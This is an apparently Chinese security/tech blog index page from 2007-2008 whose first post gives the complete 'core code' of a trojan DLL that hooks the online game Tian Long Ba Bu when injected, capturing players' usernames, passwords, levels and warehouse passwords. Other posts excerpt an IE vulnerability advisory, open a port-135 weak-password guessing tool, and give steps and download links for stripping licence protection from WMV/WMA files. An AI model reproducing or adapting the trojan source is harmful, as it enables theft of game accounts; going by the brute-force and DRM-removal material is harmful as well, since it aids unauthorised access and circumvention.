popphen.net.ru
  • 1 
预览模式: 普通 | 列表

天龙八部木马核心代码

作者:天晴无名氏 日期:2008-09-27 23:23

截取了用户名,密码,等级,仓库密码
CODE:
#include <windows.h> BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00}; BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08}; BYTE oldStoreCode[6]={0}; BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90}; DWORD ui_cegui; void *lpUserRet=NULL; void  *lpGradeRet=NULL; void  *lpStoreRet=NULL; char user[40]; char pass[40]; char storePassWord[40]; DWORD dwGrade; DWORD stroePath=0; void _stdcall StroeUnhook(); void _stdcall HookStroe(); DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule) { BYTE *buff=NULL; HMODULE hModule=::GetModuleHandle(moduleName); if(hModule==NULL) { ::MessageBox(NULL,\"获取模块错误\",\"failed\",0); return 0; } DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); *lpModule=(DWORD)newModule; memcpy(newModule,(void*)hModule,imageSize); for(DWORD i=0;i<imageSize;i++) { buff=(BYTE*)((DWORD)newModule+i); if(memcmp(buff,flag,len)==0) { *lpRet=(void*)buff; return i+(DWORD)hModule; } } return 0; } DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void <!--more-->**lpRet,DWORD newModule) { BYTE *buff=NULL; HMODULE hModule=::GetModuleHandle(moduleName); if(hModule==NULL) { ::MessageBox(NULL,\"获取模块错误\",\"failed\",0); return 0; } DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50); for(DWORD i=0;i<imageSize;i++) { buff=(BYTE*)(newModule+i); if(memcmp(buff,flag,len)==0) { *lpRet=(void*)buff; return i+(DWORD)hModule; } } return 0; } void _stdcall GetUserBuff(char *userName,char *passWord) { strcpy(user,userName); strcpy(pass,passWord); return; } __declspec(naked)void GetUserAndPass() { _asm { push eax; mov eax,dword ptr ss:[ebp+0xC]; push eax; push ecx; call GetUserBuff; call StroeUnhook; pop eax; jmp [lpUserRet]; } } void _stdcall GetGradeDword(DWORD grade) { dwGrade=grade; return; } __declspec(naked)void GetGrade() { _asm { pushad; push ebx; call GetGradeDword; call HookStroe; popad; jmp [lpGradeRet]; } } void _stdcall StroeUnhook() { if(stroePath==0) return; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)stroePath,oldStoreCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void _stdcall GetStoreBuff(char *storePass) { strcpy(storePassWord,storePass); char data[256]; wsprintf(data,\"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n\",user,pass,dwGrade,storePassWord); ::MessageBox(NULL,data,\"ok\",0); } __declspec(naked)void GetStore() { _asm { pushad; push ecx; call GetStoreBuff; call StroeUnhook; popad; jmp [lpStoreRet]; } } void _stdcall HookStroe() { stroePath=GetRealFlag(storeCode,\"ui_cegui.dll\",9,&lpStoreRet,ui_cegui); if(stroePath==0) return ; stroePath=stroePath+0x43; lpStoreRet=(void*)((DWORD)lpStoreRet+0x43); DWORD jmpAddress=(DWORD)GetStore-(stroePath+5); *(DWORD*)(&storeJmpCode[1])=jmpAddress; memcpy(oldStoreCode,(BYTE*)stroePath,6); MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)stroePath,storeJmpCode,6); VirtualProtect((void*)stroePath,7,mbi.Protect,0); return; } void HookGrade() { DWORD passPath=CmpFlag(gradeCode,\"ui_cegui.dll\",6,&lpGradeRet,&ui_cegui); if(passPath==0) return ; DWORD jmpAddress=(DWORD)GetGrade-(passPath+5); *(DWORD*)(&gradeJmpCode[1])=jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)passPath,gradeJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } void HookUserAndPass() { DWORD hModule; DWORD passPath=CmpFlag(userCode,\"game.exe\",7,&lpUserRet,&hModule); if(passPath==0) return ; DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5); *(DWORD*)(&userJmpCode[1])=jmpAddress; MEMORY_BASIC_INFORMATION mbi; VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi); memcpy((void*)passPath,userJmpCode,6); VirtualProtect((void*)passPath,7,mbi.Protect,0); } DWORD WINAPI Thread(LPVOID lpParam) { HookUserAndPass(); HookGrade(); return 0; } BOOL APIENTRY DllMain( HANDLE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved ) { switch(ul_reason_for_call) { case DLL_PROCESS_ATTACH: { DWORD ThreadId; CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId); break; } default:break; } return TRUE; }

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 120

Microsoft IE数据流处理远程代码执行漏洞

作者:天晴无名氏 日期:2008-04-15 15:48

【赛迪网-IT技术报道】IE在处理数据流时存在漏洞,远程攻击者可能利用此漏洞控制用户系统。

发布日期:2008-04-08

更新日期:2008-04-09

受影响系统:

Microsoft Internet Explorer 7.0

Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Exp

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 307

二行代码解决全部网页木马(含iframe/script木马)

作者:天晴无名氏 日期:2008-04-10 19:25

作者:vickeychen
来源:经典论坛

还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,
我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。

前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》
得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,
现在流行挂<script&

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 321

IPC空连接测试代码

作者:天晴无名氏 日期:2008-04-10 19:20

//****************************************************
//****** 网蝉工具--135弱口令猜解器 ******
//ip.txt纪录要猜测的IP地址。
//user.txt纪录要猜测的用户名。
//password.txt纪录要猜测的密码。
//3个文件格式为标准的字典文件, 方便与修改和承接其他扫描器扫出的结果。
//********

[阅读全文]

标签: IPC 测试 代码
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 194

祛除电影中嵌入的代码的利器和解决WMV格式的电影需要许可证

作者:天晴无名氏 日期:2007-03-25 02:22

RM电影文件里嵌入代码的问题越来越严重,虽然保证本论坛原创的电影文件绝不含有这类代码,但仍难保证会员所转贴电影中含有有害“物质”。
为使光临和支持论坛的每位会员能安心地观赏电影,特别提供一款祛除电影中嵌入的代码的利器--多媒体木马克星。
该软件使用直观方便,省却了以往使用RealMedia Editor祛除RM中代码的烦琐操作!
该打包文件经卡巴斯基检查,不含病毒,请放心使用!最后,感谢大家对迅雷源论坛的支持!


解决wmv文件的许可证破解

下过wmv的电影,下完后不能播放,所以找了此帖,希望可以帮助那些和我遇到一样问题的人。
特别提示!最近有些影片加了许可证保护,引用下面的方案可以解决
wmv文件的许可证破解
使用方法:
首先请先开始正常聆听有保护的的WMA文件
入工具选项里面的证书管理
进行证书导出
导出后的证书文件建议放于一特定目录
将其freeme压缩包解压到证书文件所在文件夹 这时再把需要解除保护的文件放于同一文件夹
DOS命令行窗口输入 freeme 文件.wma
于是得到 freed-文件.wma 此文件即为没有任何保护的普通WMA文件 可以任意播放.
【注意】解除保护需要一可用证书 如果freeme运行无效 请导出你拥有的最新证书文件,像9天的可以获取到证书再进行破解。
[/size]
[size=4]点击下载
FreeMe:http://netroom.hbu.edu.cn/personal/crackmore/crsoft/cr-wma.zip

另一个软件(看了就会用)
点击下载
UnFuck:http://netroom.hbu.edu.cn/personal/crackmore/crsoft/cr-wma2.zip

如果还不行,请看下面:
**最近看到的方法,安装media player 7 或更低版本即可观看,大家可以试试看。
事实上"每个系统"中都有隐藏的6.4版本存在。为什么?因为微软自己也知道,MediaPlayer的6.4版本是最最稳定的,其他的诸如7.0、8.0版本,播放MPEG4的剪辑时都会出现这样或者那样的问题。
Media Player 6.4的位置一般如下:
C:Program FilesWindows Media Playermplayer2.exe

多媒体木马克星:http://xunleiyuan.com/job.php?action=download&pid=tpc&tid=4529&aid=1265
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 1576

网页框架代码和网页自动跳转代码

作者:天晴无名氏 日期:2007-02-28 08:49

网页框架代码

特点是无论使用何种分辨率,它的大小和位置都是不变的。

我所收集的:

1.
[html]


[/html]

2.右边框架





3.上下框架





4.网页内嵌框架


~~~~~

也可以自己修在框架大小:





在当前网页中包含另一个网页:



9、网页打开后,隔一定时间自动刷新:



10、网页打开后,隔一定时间自动跳转到另一页:




两个域名同一个空间自动跳转的ASP代码
<%if Request.ServerVariables("SERVER_NAME")="cdpy.com" then
response.redirect "default.asp"
else%>
<%end if%>
<%if Request.ServerVariables("SERVER_NAME")="www.cdpy.com" then
response.redirect "default.asp"
else%>
<%end if%>
<%if Request.ServerVariables("SERVER_NAME")="xingqiba.com" then
response.redirect "cdhome/default.asp"
else%>
<%end if%>
<%if Request.ServerVariables("SERVER_NAME")="www.xingqiba.com" then
response.redirect "cdhome/default.asp"
else%>
<%end if%>
<%if Request.ServerVariables("SERVER_NAME")="blog.xingqiba.com" then
response.redirect "blog/"
else%>
html中跳转最全代码





正在进入



 

正在进入,请稍等...
  
  
  
  
 



如果您的浏览器不支持跳转,请点这里.




脚本方式
如:

html的meta方式
如:

这种方法的好处是可以控制重定向的时间
类别: Articles | 引用: 40 | 评论: 0 | 阅读: 472

Imperator FLA SWF 【木蚂蚁专用版】

作者:天晴无名氏 日期:2007-02-17 16:19

将任何一个SWF文件完美还原成FLA原始代码!&rdquo;,笔者第一次看到此消息时有些震惊。在此之前,相信众多喜欢Flash动画的朋友都是使用SWF Scaner、闪客快斧、Action Script Viewer等来分解SWF文件内部的图片、音乐甚至动作脚本(Action Scripts)等信息,对于SWF还原为FLA文件,不会抱有太大的奢望,不过今天,这一切似乎成为了现实,究竟是什么软件拥有这么大的魔力?

  Imperator FLA是一个将SWF文件还原为FLA文件的工具。只要您的系统中安装有Macromedia Flash MX以上版本,就能够利用此软件将已经编译好的SWF文件还原成FLA源文件,这个FLA文件中包含所有的图片、影片、音乐甚至AS信息,您完全可以使用Macromedia Flash软件对其回炉再造,重新编译成需要的SWF文件。

  Imperator FLA是一套可以从 SWF 文件格式转成 FLA 文件格式的软件,如此你可以由 Flash MX 软件中加以修改原来的 SWF 文件的内容。你只要作选择所要开启的 SWF 文件,再另存成 FLA 文件即可,再使用Flash MX 软件开启另存的 FLA 文件,再以 Flash MX 软件加以修改此文件的数据即可。


右键迅雷下载

类别: Resources | 引用: 50 | 评论: 0 | 阅读: 391
  • 1 

订阅本站

使用Email订阅